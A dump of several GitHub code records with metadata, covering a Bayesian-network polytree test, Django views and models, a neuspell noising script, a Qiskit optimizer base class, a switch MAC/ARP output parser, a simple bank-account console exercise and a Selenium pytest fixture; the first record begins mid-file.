==\n np.array([0.06716418, 0.93283582])).all()\n\n assert (np.round(sprinkler.node['S']['belief'], 8) ==\n np.array([0.83955224, 0.16044776])).all()\n\n assert (np.round(sprinkler.node['W']['belief'], 8) ==\n np.array([0.00000000, 1.00000000])).all()\n\n assert (np.round(sprinkler.node['H']['belief'], 8) ==\n np.array([0.00000000, 1.00000000])).all()\n\n\ndef get_cancer():\n\n #\n # Twardy, C., Nicholson, a, Korb, K., & McNeil, J. (2004).\n # Data mining cardiovascular bayesian networks\n #\n\n cancer = nx.DiGraph()\n\n cancer.add_node('M', prior=np.array([0.1, 0.9]))\n\n cancer.add_node('S', CPT=np.zeros((2, 2)))\n cancer.add_edge('M', 'S')\n cancer.node['S']['CPT'][0, :] = np.array([0.8, 0.2])\n cancer.node['S']['CPT'][1, :] = np.array([0.2, 0.8])\n\n cancer.add_node('B', CPT=np.zeros((2, 2)))\n cancer.add_edge('M', 'B')\n cancer.node['B']['CPT'][0, :] = np.array([0.95, 0.05])\n cancer.node['B']['CPT'][1, :] = np.array([0.80, 0.20])\n\n cancer.add_node('C', CPT=np.zeros((2, 2, 2)))\n cancer.add_edge('B', 'C')\n cancer.add_edge('S', 'C')\n cancer.node['C']['CPT'][0, 0, :] = np.array([0.95, 0.05])\n cancer.node['C']['CPT'][0, 1, :] = np.array([0.20, 0.80])\n cancer.node['C']['CPT'][1, 0, :] = np.array([0.20, 0.80])\n cancer.node['C']['CPT'][1, 1, :] = np.array([0.20, 0.80])\n\n cancer.add_node('H', CPT=np.zeros((2, 2)))\n cancer.add_edge('B', 'H')\n cancer.node['H']['CPT'][0, :] = np.array([0.4, 0.6])\n cancer.node['H']['CPT'][1, :] = np.array([0.2, 0.8])\n\n cancer.node['C']['observation'] = np.array([0., 1.])\n\n return cancer\n\n\ndef cancer_example(analyse_function):\n\n cancer = get_cancer()\n\n analyse_function(cancer)\n\n assert (np.round(cancer.node['M']['belief'], 3) == np.array([0.036, 0.964])).all()\n assert (np.round(cancer.node['S']['belief'], 3) == np.array([0.068, 0.932])).all()\n assert (np.round(cancer.node['B']['belief'], 3) == np.array([0.767, 0.233])).all()\n assert (np.round(cancer.node['C']['belief'], 3) == np.array([0.000, 1.000])).all()\n assert (np.round(cancer.node['H']['belief'], 3) == np.array([0.353, 0.647])).all()\n\n\nfrom pinfer.infer import analyse_polytree\n\n\nclass TestPolytree(unittest.TestCase):\n\n def setUp(self):\n pass\n\n def test_sprinkler(self):\n sprinkler_example(analyse_polytree)\n\n def tearDown(self):\n pass\n\n\nif __name__ == '__main__':\n unittest.main()\n", "repo_name": "nickfyson/pinfer", "sub_path": "tests/test_pinfer.py", "file_name": "test_pinfer.py", "file_ext": "py", "file_size_in_byte": 4565, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "networkx.DiGraph", "line_number": 19, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 21, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 23, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 25, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 27, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 28, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 30, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 33, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 34, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 35, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 36, "usage_type": "call"}, {"api_name": "numpy.round", "line_number": 47, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 47, "usage_type": "call"}, {"api_name": "numpy.round", "line_number": 48, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 48, "usage_type": "call"}, {"api_name": "numpy.round", "line_number": 49, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 49, "usage_type": "call"}, {"api_name": "numpy.round", "line_number": 50, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 50, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 52, "usage_type": "call"}, {"api_name": "numpy.round", "line_number": 56, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 57, "usage_type": "call"}, {"api_name": "numpy.round", "line_number": 59, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 60, "usage_type": "call"}, {"api_name": "numpy.round", "line_number": 62, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 63, "usage_type": "call"}, {"api_name": "numpy.round", "line_number": 65, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 66, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 68, "usage_type": "call"}, {"api_name": "numpy.round", "line_number": 72, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 73, "usage_type": "call"}, {"api_name": "numpy.round", "line_number": 75, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 76, "usage_type": "call"}, {"api_name": "numpy.round", "line_number": 78, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 79, "usage_type": "call"}, {"api_name": "numpy.round", "line_number": 81, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 82, "usage_type": "call"}, {"api_name": "networkx.DiGraph", "line_number": 92, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 94, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 96, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 98, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 99, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 101, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 103, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 104, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 106, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 109, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 110, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 111, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 112, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 114, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 116, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 117, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 119, "usage_type": "call"}, {"api_name": "numpy.round", "line_number": 130, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 130, "usage_type": "call"}, {"api_name": "numpy.round", "line_number": 131, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 131, "usage_type": "call"}, {"api_name": "numpy.round", "line_number": 132, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 132, "usage_type": "call"}, {"api_name": "numpy.round", "line_number": 133, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 133, "usage_type": "call"}, {"api_name": "numpy.round", "line_number": 134, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 134, "usage_type": "call"}, {"api_name": "unittest.TestCase", "line_number": 140, "usage_type": "attribute"}, {"api_name": "pinfer.infer.analyse_polytree", "line_number": 146, "usage_type": "argument"}, {"api_name": "unittest.main", "line_number": 153, "usage_type": "call"}]}
+{"seq_id": "34490050869", "text": "from django.shortcuts import render\nfrom django.core.paginator import Paginator\n\nfrom ..objects.menuitem import MenuItem\nfrom ..models import News\n\n\ndef index(request):\n news_list = News.objects.filter(hidden=False).order_by(\"-created_at\")\n paginator = Paginator(news_list, 5)\n page = request.GET.get(\"page\") if \"page\" in request.GET else 1\n\n menu_items = []\n if request.user.is_authenticated:\n if request.user.profile.roles.filter(name=\"writer\").exists():\n menu_items.append(MenuItem(\n \"/news/my\",\n \"My news\"\n ))\n\n if request.user.is_superuser:\n menu_items.append(MenuItem(\n \"/admin\",\n \"Admin\"\n ))\n\n menu_items.append(MenuItem(\n \"/accounts/logout\",\n \"Log out\"\n ))\n else:\n menu_items.extend((\n MenuItem(\n \"/accounts/login\",\n \"Log in\"\n ),\n MenuItem(\n \"/register\",\n \"Register\"\n )\n ))\n\n context = {\n \"title\": \"Latest news\",\n \"news_list\": paginator.get_page(page),\n \"menu_items\": menu_items,\n }\n\n return render(request, \"index.html\", context)\n", "repo_name": "hts1238/Django-Example", "sub_path": "DjangoExample/DjangoExampleApp/views/index.py", "file_name": "index.py", "file_ext": "py", "file_size_in_byte": 1259, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "models.News.objects.filter", "line_number": 9, "usage_type": "call"}, {"api_name": "models.News.objects", "line_number": 9, "usage_type": "attribute"}, {"api_name": "models.News", "line_number": 9, "usage_type": "name"}, {"api_name": "django.core.paginator.Paginator", "line_number": 10, "usage_type": "call"}, {"api_name": "objects.menuitem.MenuItem", "line_number": 16, "usage_type": "call"}, {"api_name": "objects.menuitem.MenuItem", "line_number": 22, "usage_type": "call"}, {"api_name": "objects.menuitem.MenuItem", "line_number": 27, "usage_type": "call"}, {"api_name": "objects.menuitem.MenuItem", "line_number": 33, "usage_type": "call"}, {"api_name": "objects.menuitem.MenuItem", "line_number": 37, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 49, "usage_type": "call"}]}
+{"seq_id": "1240001821", "text": "from neuspell.noising import CharacterReplacementNoiser\nfrom neuspell.noising import ProbabilisticCharacterReplacementNoiser\nfrom neuspell.noising import WordReplacementNoiser\n\nexample_texts = [\n \"This is an example sentence to demonstrate noising in the neuspell repository.\",\n \"Here is another such amazing example!!\"\n]\n\nnoisers = [\n CharacterReplacementNoiser,\n ProbabilisticCharacterReplacementNoiser,\n WordReplacementNoiser,\n]\n\nprint(\"\\n\\n---------------------------------------\\n---------------------------------------\\n\\n\")\n\nfor noiser in noisers:\n print(f\"testing {noiser.__name__}\")\n\n my_noiser = noiser(language=\"english\")\n my_noiser.load_resources()\n noise_texts = my_noiser.noise(example_texts)\n print(noise_texts)\n\n preprocessor = noiser.create_preprocessor(lower_case=True, remove_accents=True)\n retokenizer = noiser.create_retokenizer()\n noise_texts = my_noiser.noise(example_texts, preprocessor=preprocessor, retokenizer=retokenizer)\n print(noise_texts)\n\n preprocessor = noiser.create_preprocessor(lower_case=True, remove_accents=True)\n retokenizer = noiser.create_retokenizer(use_spacy_retokenization=True)\n noise_texts = my_noiser.noise(example_texts, preprocessor=preprocessor, retokenizer=retokenizer)\n print(noise_texts)\n\n print(\"\\n\\n---------------------------------------\\n---------------------------------------\\n\\n\")\n", "repo_name": "neuspell/neuspell", "sub_path": "tests/test_noisers.py", "file_name": "test_noisers.py", "file_ext": "py", "file_size_in_byte": 1399, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 611, "dataset": "github-code", "pt": "31", "api": [{"api_name": "neuspell.noising.CharacterReplacementNoiser", "line_number": 11, "usage_type": "name"}, {"api_name": "neuspell.noising.ProbabilisticCharacterReplacementNoiser", "line_number": 12, "usage_type": "name"}, {"api_name": "neuspell.noising.WordReplacementNoiser", "line_number": 13, "usage_type": "name"}]}
+{"seq_id": "15158252807", "text": "from django.db import models\n\nfrom ._base import BaseModel, include_schema\n\n\nclass Source(BaseModel):\n class Meta:\n db_table = 'music\".\"sources'\n managed = False\n\n markets = models.ManyToManyField(\n \"Country\",\n name=\"markets\",\n db_table=include_schema(\"source_markets\"),\n related_name=\"sources\",\n )\n\n genres = models.ManyToManyField(\n \"Genre\",\n name=\"genres\",\n db_table=include_schema(\"source_genres\"),\n related_name=\"sources\",\n )\n", "repo_name": "phucnt1992/PersonaCode", "sub_path": "services/django/music/models/source.py", "file_name": "source.py", "file_ext": "py", "file_size_in_byte": 516, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "_base.BaseModel", "line_number": 6, "usage_type": "name"}, {"api_name": "django.db.models.ManyToManyField", "line_number": 11, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 11, "usage_type": "name"}, {"api_name": "_base.include_schema", "line_number": 14, "usage_type": "call"}, {"api_name": "django.db.models.ManyToManyField", "line_number": 18, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 18, "usage_type": "name"}, {"api_name": "_base.include_schema", "line_number": 21, "usage_type": "call"}]}
+{"seq_id": "32863007065", "text": "from qiskit.aqua import Pluggable\nfrom abc import abstractmethod\nfrom enum import IntEnum\nimport logging\nimport numpy as np\n\nlogger = logging.getLogger(__name__)\n\n\nclass Optimizer(Pluggable):\n \"\"\"Base class for optimization algorithm.\"\"\"\n\n class SupportLevel(IntEnum):\n not_supported = 0 # Does not support the corresponding parameter in optimize()\n ignored = 1 # Feature can be passed as non None but will be ignored\n supported = 2 # Feature is supported\n required = 3 # Feature is required and must be given, None is invalid\n\n \"\"\"\n Base class for Optimizers.\n\n This method should initialize the module and its configuration, and\n use an exception if a component of the module is\n available.\n\n Args:\n configuration (dict): configuration dictionary\n \"\"\"\n DEFAULT_CONFIGURATION = {\n 'support_level': {\n 'gradient': SupportLevel.not_supported,\n 'bounds': SupportLevel.not_supported,\n 'initial_point': SupportLevel.not_supported\n },\n 'options': []\n }\n\n @abstractmethod\n def __init__(self):\n \"\"\"Constructor.\n\n Initialize the optimization algorithm, setting the support\n level for _gradient_support_level, _bound_support_level,\n _initial_point_support_level, and empty options.\n\n \"\"\"\n super().__init__()\n if 'support_level' not in self._configuration:\n self._configuration['support_level'] = self.DEFAULT_CONFIGURATION['support_level']\n if 'options' not in self._configuration:\n self._configuration['options'] = self.DEFAULT_CONFIGURATION['options']\n self._gradient_support_level = self._configuration['support_level']['gradient']\n self._bounds_support_level = self._configuration['support_level']['bounds']\n self._initial_point_support_level = self._configuration['support_level']['initial_point']\n self._options = {}\n self._batch_mode = False\n\n @classmethod\n def init_params(cls, params):\n \"\"\"Initialize with a params dictionary.\n\n A dictionary of config params as per the configuration object. Some of these params get\n passed to scipy optimizers in an options dictionary. We can specify an options array of\n names in config dictionary to have the options dictionary automatically populated. All\n other config items, excluding name, will be passed to init_args\n\n Args:\n params (dict): configuration dict\n \"\"\"\n logger.debug('init_params: {}'.format(params))\n args = {k: v for k, v in params.items() if k != 'name'}\n optimizer = cls(**args)\n return optimizer\n\n def set_options(self, **kwargs):\n \"\"\"\n Sets or updates values in the options dictionary.\n\n The options dictionary may be used internally by a given optimizer to\n pass additional optional values for the underlying optimizer/optimization\n function used. The options dictionary may be initially populated with\n a set of key/values when the given optimizer is constructed.\n\n Args:\n kwargs (dict): options, given as name=value.\n \"\"\"\n for name, value in kwargs.items():\n self._options[name] = value\n logger.debug('options: {}'.format(self._options))\n\n @staticmethod\n def gradient_num_diff(x_center, f, epsilon):\n \"\"\"\n We compute the gradient with the numeric differentiation in the parallel way, around the point x_center.\n Args:\n x_center (ndarray): point around which we compute the gradient\n f (func): the function of which the gradient is to be computed.\n epsilon (float): the epsilon used in the numeric differentiation.\n Returns:\n grad: the gradient computed\n\n \"\"\"\n forig = f(*((x_center,)))\n grad = np.zeros((len(x_center),), float)\n ei = np.zeros((len(x_center),), float)\n todos = []\n for k in range(len(x_center)):\n ei[k] = 1.0\n d = epsilon * ei\n todos.append(x_center + d)\n ei[k] = 0.0\n parallel_parameters = np.concatenate(todos)\n todos_results = f(parallel_parameters)\n for k in range(len(x_center)):\n grad[k] = (todos_results[k] - forig) / epsilon\n return grad\n\n @staticmethod\n def wrap_function(function, args):\n \"\"\"\n Wrap the function to implicitly inject the args at the call of the function.\n Args:\n function (func): the target function\n args (tuple): the args to be injected\n\n \"\"\"\n def function_wrapper(*wrapper_args):\n return function(*(wrapper_args + args))\n return function_wrapper\n\n @property\n def setting(self):\n ret = \"Optimizer: {}\\n\".format(self._configuration['name'])\n params = \"\"\n for key, value in self.__dict__.items():\n if key != \"_configuration\" and key[0] == \"_\":\n params += \"-- {}: {}\\n\".format(key[1:], value)\n ret += \"{}\".format(params)\n return ret\n\n @abstractmethod\n def optimize(self, num_vars, objective_function, gradient_function=None, variable_bounds=None, initial_point=None):\n \"\"\"Perform optimization.\n\n Args:\n num_vars (int) : number of parameters to be optimized.\n objective_function (callable) : handle to a function that\n computes the objective function.\n gradient_function (callable) : handle to a function that\n computes the gradient of the objective function, or\n None if not available.\n variable_bounds (list[(float, float)]) : list of variable\n bounds, given as pairs (lower, upper). None means\n unbounded.\n initial_point (numpy.ndarray[float]) : initial point.\n\n Returns:\n point, value, nfev\n point: is a 1D numpy.ndarray[float] containing the solution\n value: is a float with the objective function value\n nfev: number of objective function calls made if available or None\n \"\"\"\n\n if initial_point is not None and len(initial_point) != num_vars:\n raise ValueError('Initial point does not match dimension')\n if variable_bounds is not None and len(variable_bounds) != num_vars:\n raise ValueError('Variable bounds not match dimension')\n\n has_bounds = False\n if variable_bounds is not None:\n # If *any* value is *equal* in bounds array to None then the does *not* have bounds\n has_bounds = not np.any(np.equal(variable_bounds, None))\n\n if gradient_function is None and self.is_gradient_required:\n raise ValueError('Gradient is required but None given')\n if not has_bounds and self.is_bounds_required:\n raise ValueError('Variable bounds is required but None given')\n if initial_point is None and self.is_initial_point_required:\n raise ValueError('Initial point is required but None given')\n\n if gradient_function is not None and self.is_gradient_ignored:\n logger.debug('WARNING: {} does not support gradient function. It will be ignored.'.format(self.configuration['name']))\n if has_bounds and self.is_bounds_ignored:\n logger.debug('WARNING: {} does not support bounds. It will be ignored.'.format(self.configuration['name']))\n if initial_point is not None and self.is_initial_point_ignored:\n logger.debug('WARNING: {} does not support initial point. It will be ignored.'.format(self.configuration['name']))\n pass\n\n @property\n def gradient_support_level(self):\n return self._gradient_support_level\n\n @property\n def is_gradient_ignored(self):\n return self._gradient_support_level == self.SupportLevel.ignored\n\n @property\n def is_gradient_supported(self):\n return self._gradient_support_level != self.SupportLevel.not_supported\n\n @property\n def is_gradient_required(self):\n return self._gradient_support_level == self.SupportLevel.required\n\n @property\n def bounds_support_level(self):\n return self._bounds_support_level\n\n @property\n def is_bounds_ignored(self):\n return self._bounds_support_level == self.SupportLevel.ignored\n\n @property\n def is_bounds_supported(self):\n return self._bounds_support_level != self.SupportLevel.not_supported\n\n @property\n def is_bounds_required(self):\n return self._bounds_support_level == self.SupportLevel.required\n\n @property\n def initial_point_support_level(self):\n return self._initial_point_support_level\n\n @property\n def is_initial_point_ignored(self):\n return self._initial_point_support_level == self.SupportLevel.ignored\n\n @property\n def is_initial_point_supported(self):\n return self._initial_point_support_level != self.SupportLevel.not_supported\n\n @property\n def is_initial_point_required(self):\n return self._initial_point_support_level == self.SupportLevel.required\n\n def print_options(self):\n \"\"\"Print algorithm-specific options.\"\"\"\n for name in sorted(self._options):\n logger.debug('{:s} = {:s}'.format(name, str(self._options[name])))\n\n def set_batch_mode(self, mode):\n self._batch_mode = mode\n", "repo_name": "epiqc/PartialCompilation", "sub_path": "qiskit-aqua/qiskit/aqua/components/optimizers/optimizer.py", "file_name": "optimizer.py", "file_ext": "py", "file_size_in_byte": 9460, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 11, "dataset": "github-code", "pt": "31", "api": [{"api_name": "logging.getLogger", "line_number": 7, "usage_type": "call"}, {"api_name": "qiskit.aqua.Pluggable", "line_number": 10, "usage_type": "name"}, {"api_name": "enum.IntEnum", "line_number": 13, "usage_type": "name"}, {"api_name": "abc.abstractmethod", "line_number": 38, "usage_type": "name"}, {"api_name": "numpy.zeros", "line_number": 104, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 105, "usage_type": "call"}, {"api_name": "numpy.concatenate", "line_number": 112, "usage_type": "call"}, {"api_name": "numpy.any", "line_number": 172, "usage_type": "call"}, {"api_name": "numpy.equal", "line_number": 172, "usage_type": "call"}, {"api_name": "abc.abstractmethod", "line_number": 141, "usage_type": "name"}]}
+{"seq_id": "10148168333", "text": "import re\nimport tools.exceptions\nfrom mac_vendor_lookup import MacLookup\n\nMAC_PATTERN = \"^\\s*([a-z0-9]{6}-[a-z0-9]{6})\\s*(\\S+)\\s*(\\d)*$\"\nMAC_PATTERN_COMPILED = re.compile(MAC_PATTERN)\n\nPORT_PATTERN = \"^\\s{2}(.{8})\\s{1}(.{10})\\s{1}(.{7})\\s{1}(.{13})\\s{1}(.{8})\\s{1}(.{10})\\s{1}(.{6})\\s{1}(.{1,8})\"\nPORT_PATTERN_COMPILED = re.compile(PORT_PATTERN)\n\nARP_PATTERN = \"^(.{15})\\s(.{12})\\s*\\S*\\s*(\\S*).*\"\nARP_PATTERN_COMPILED = re.compile(ARP_PATTERN)\n\nmacLookup = MacLookup()\n\nclass MacInfo:\n def __init__(self, text, patternCompiled):\n global macLookup\n m = patternCompiled.match(text)\n if not m:\n raise tools.exceptions.InputException\n else:\n self.mac = normalize_mac_two_groups(m.group(1))\n self.port = m.group(2)\n self.vlan = m.group(3)\n self.ip = None\n try:\n self.vendor = macLookup.lookup(self.mac)\n except:\n self.vendor = \"UNKNOWN\"\n\n def setIP(self, ip):\n self.ip = ip\n\nclass PortInfo:\n def __init__(self, text, patternCompiled):\n m = patternCompiled.match(text)\n if not m:\n raise tools.exceptions.InputException\n else:\n self.port = m.group(1).strip()\n self.name = m.group(2).strip()\n self.status = m.group(3).strip()\n self.mode = m.group(4).strip()\n self.speed = m.group(5).strip()\n self.type = m.group(6).strip()\n self.tagged = m.group(7).strip()\n self.untagged = m.group(8).strip()\n self.macs = []\n\n def addMac(self, mac):\n self.macs.append(mac)\n\nclass DevicePattern:\n def __init__(self):\n self.patterns = {}\n\n def add_pattern(self, name, pattern):\n if name not in pattern:\n self.patterns[name] = {}\n self.patterns[name]['pattern'] = pattern\n self.patterns[name]['compiled'] = re.compile(pattern)\n\n def get_pattern(self, name):\n if name not in self.patterns:\n raise tools.exceptions.NonExistentPattern\n else:\n return self.patterns[name]['pattern']\n\n def get_pattern_compiled(self, name):\n if name not in self.patterns:\n raise tools.exceptions.NonExistentPattern\n else:\n return self.patterns[name]['compiled']\n\n\ndef load_patterns():\n devPatterns = DevicePattern()\n\n devPatterns.add_pattern('arubaswos_farmtec_macaddresstable', \"^\\s*([a-z0-9]{6}-[a-z0-9]{6})\\s*(\\S+)\\s*(\\d)*$\")\n devPatterns.add_pattern('arubaswos_farmtec_showint', \"^\\s{2}(.{8})\\s{1}(.{10})\\s{1}(.{7})\\s{1}(.{13})\\s{1}(.{8})\\s{1}(.{10})\\s{1}(.{6})\\s{1}(.{1,8})\")\n devPatterns.add_pattern('juniper_farmtec_getarp_old', \"^(.{15})\\s(.{12})\\s*\\S*\\s*(\\S*).*\")\n devPatterns.add_pattern('juniper_farmtec_getarp', \"^(.{16})\\s(.{12})\\s*\\S*\\s*(\\S*).*\")\n\n return devPatterns\n\n\ndef parse_arp(text, patternCompiled):\n m = patternCompiled.match(text)\n if not m:\n raise tools.exceptions.InputException\n else:\n ip = m.group(1).strip()\n mac = normalize_mac_twelve_digits(m.group(2).strip())\n state = m.group(3).strip()\n return mac, ip, state\n\ndef normalize_mac_two_groups(mac):\n return \"{}:{}:{}:{}:{}:{}\".format(mac[0:2], mac[2:4], mac[4:6], mac[7:9], mac[9:11], mac[11:13])\n\ndef normalize_mac_twelve_digits(mac):\n return \"{}:{}:{}:{}:{}:{}\".format(mac[0:2], mac[2:4], mac[4:6], mac[6:8], mac[8:10], mac[10:12])\n\n\n", "repo_name": "robac/arubaos_port_devices", "sub_path": "tools/tools.py", "file_name": "tools.py", "file_ext": "py", "file_size_in_byte": 3446, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "re.compile", "line_number": 6, "usage_type": "call"}, {"api_name": "re.compile", "line_number": 9, "usage_type": "call"}, {"api_name": "re.compile", "line_number": 12, "usage_type": "call"}, {"api_name": "mac_vendor_lookup.MacLookup", "line_number": 14, "usage_type": "call"}, {"api_name": "tools.exceptions.exceptions", "line_number": 21, "usage_type": "attribute"}, {"api_name": "tools.exceptions", "line_number": 21, "usage_type": "name"}, {"api_name": "tools.exceptions.exceptions", "line_number": 39, "usage_type": "attribute"}, {"api_name": "tools.exceptions", "line_number": 39, "usage_type": "name"}, {"api_name": "re.compile", "line_number": 62, "usage_type": "call"}, {"api_name": "tools.exceptions.exceptions", "line_number": 66, "usage_type": "attribute"}, {"api_name": "tools.exceptions", "line_number": 66, "usage_type": "name"}, {"api_name": "tools.exceptions.exceptions", "line_number": 72, "usage_type": "attribute"}, {"api_name": "tools.exceptions", "line_number": 72, "usage_type": "name"}, {"api_name": "tools.exceptions.exceptions", "line_number": 91, "usage_type": "attribute"}, {"api_name": "tools.exceptions", "line_number": 91, "usage_type": "name"}]}
+{"seq_id": "36981969947", "text": "from datetime import datetime, timedelta\n\nclass ContaBancaria:\n def __init__(self, agencia, conta, saldo_inicial=0):\n self.agencia = agencia\n self.conta = conta\n self.saldo = saldo_inicial\n self.transacoes = []\n self.ultimo_reset = datetime.now()\n\n def deposito(self, valor):\n if valor >= 0:\n self.saldo += valor\n self.transacoes.append(\"Depósito: R${:.2f}\".format(valor))\n return True\n else:\n return False\n\n def saque(self, valor):\n hoje = datetime.now()\n if (hoje - self.ultimo_reset).days > 0:\n self.transacoes = []\n self.ultimo_reset = hoje\n\n if 0 < valor <= 500 and len(self.transacoes) < 3 and valor <= self.saldo:\n self.saldo -= valor\n self.transacoes.append(\"Saque: R${:.2f}\".format(valor))\n return True\n elif self.saldo < valor:\n print(\"Saldo insuficiente para saque\")\n return False\n else:\n print(\"Limite diário de saques atingido ou valor de saque inválido\")\n return False\n\n def extrato(self):\n extrato = \"Saldo: R${:.2f}\\n\".format(self.saldo)\n extrato += \"\\n\".join(self.transacoes)\n return extrato\n\n\nagencia = input(\"Digite o número da agência: \")\nconta = input(\"Digite o número da conta: \")\n\nconta_usuario = ContaBancaria(agencia, conta, saldo_inicial=1000)\n\nwhile True:\n print(\"\\nMenu:\")\n print(\"1 - Depósito\")\n print(\"2 - Saque\")\n print(\"3 - Extrato\")\n print(\"0 - Sair\")\n opcao = input(\"Escolha uma opção: \")\n\n if opcao == \"1\":\n valor = float(input(\"Digite o valor para depósito: \"))\n conta_usuario.deposito(valor)\n elif opcao == \"2\":\n valor = float(input(\"Digite o valor para saque: \"))\n if conta_usuario.saldo - valor >= 0:\n conta_usuario.saque(valor)\n else:\n print(\"Saldo insuficiente para saque\")\n elif opcao == \"3\":\n print(conta_usuario.extrato())\n elif opcao == \"0\":\n break\n else:\n print(\"Opção inválida\")\n\nprint(\"Obrigado por utilizar nosso sistema!\")\n", "repo_name": "Richardmsbr/dio_desafio", "sub_path": "desafio_bancario.py", "file_name": "desafio_bancario.py", "file_ext": "py", "file_size_in_byte": 2157, "program_lang": "python", "lang": "pt", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "datetime.datetime.now", "line_number": 9, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 9, "usage_type": "name"}, {"api_name": "datetime.datetime.now", "line_number": 20, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 20, "usage_type": "name"}]}
+{"seq_id": "15999875798", "text": "from selenium import webdriver\nimport pytest\nimport time\n\n# driver = webdriver.Firefox(executable_path=\"C:\\\\Users\\\\hewer\\\\Projects\\\\pytest-appium\\\\Drivers\\\\geckodriver.exe\")\n# driver = webdriver.Ie(executable_path=\"C:\\\\Users\\\\hewer\\\\Projects\\\\pytest-appium\\\\Drivers\\\\IEDriverServer.exe\")\n\ndef pytest_addoption(parser):\n parser.addoption(\n \"--browser_name\", action=\"store\", default=\"chrome\"\n )\n\n@pytest.fixture(scope=\"class\")\ndef setup(request):\n browser_name=request.config.getOption(\"browser_name\")\n if browser_name == \"chrome\":\n driver = webdriver.Chrome(executable_path=\"C:\\\\Users\\\\hewer\\\\Projects\\\\pytest-appium\\\\Drivers\\\\chromedriver.exe\")\n\n elif browser_name == \"firefox\":\n driver = webdriver.Firefox(executable_path=\"C:\\\\Users\\\\hewer\\\\Projects\\\\pytest-appium\\\\Drivers\\\\geckodriver.exe\")\n\n elif browser_name == \"ie\":\n driver = webdriver.Ie(executable_path=\"C:\\\\Users\\\\hewer\\\\Projects\\\\pytest-appium\\\\Drivers\\\\IEDriverServer.exe\")\n\n driver.get(\"https://qaclickacademy.github.io/protocommerce/\")\n driver.maximize_window()\n request.cls.driver = driver\n yield\n driver.close()\n", "repo_name": "hewerthon/pytest-appium", "sub_path": "pytest_e2e/conftest.py", "file_name": "conftest.py", "file_ext": "py", "file_size_in_byte": 1139, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "selenium.webdriver.Chrome", "line_number": 17, "usage_type": "call"}, {"api_name": "selenium.webdriver", "line_number": 17, "usage_type": "name"}, {"api_name": "selenium.webdriver.Firefox", "line_number": 20, "usage_type": "call"}, {"api_name": "selenium.webdriver", "line_number": 20, "usage_type": "name"}, {"api_name": "selenium.webdriver.Ie", "line_number": 23, "usage_type": "call"}, {"api_name": "selenium.webdriver", "line_number": 23, "usage_type": "name"}, {"api_name": "pytest.fixture", "line_number": 13, "usage_type": "call"}]}
